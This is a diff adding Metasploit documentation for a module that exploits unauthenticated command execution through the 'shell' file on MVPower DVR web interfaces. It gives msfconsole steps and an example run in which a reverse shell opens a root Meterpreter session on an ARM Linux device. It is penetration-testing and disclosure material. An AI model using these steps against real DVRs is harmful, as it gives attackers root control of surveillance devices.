Add documentation

Author: bcoles

documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md

@@ -0,0 +1,43 @@
+## Vulnerable Application
+
+  This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
+
+  This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+  The TV-7108HE model is also reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set lhost [IP]`
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+
+  ```
+  msf exploit(mvpower_dvr_shell_exec) > run
+
+  [*] Started reverse TCP handler on 10.1.1.197:4444 
+  [*] 10.1.1.191:80 - Connecting to target
+  [+] 10.1.1.191:80 - Target is vulnerable!
+  [*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
+  [*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
+  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
+  [*] Command Stager progress - 100.00% done (117/117 bytes)
+  [*] Server stopped.
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 10.1.1.191
+  OS           :  (Linux 3.0.8)
+  Architecture : armv7l
+  Meterpreter  : armle/linux
+  meterpreter > 
+  ```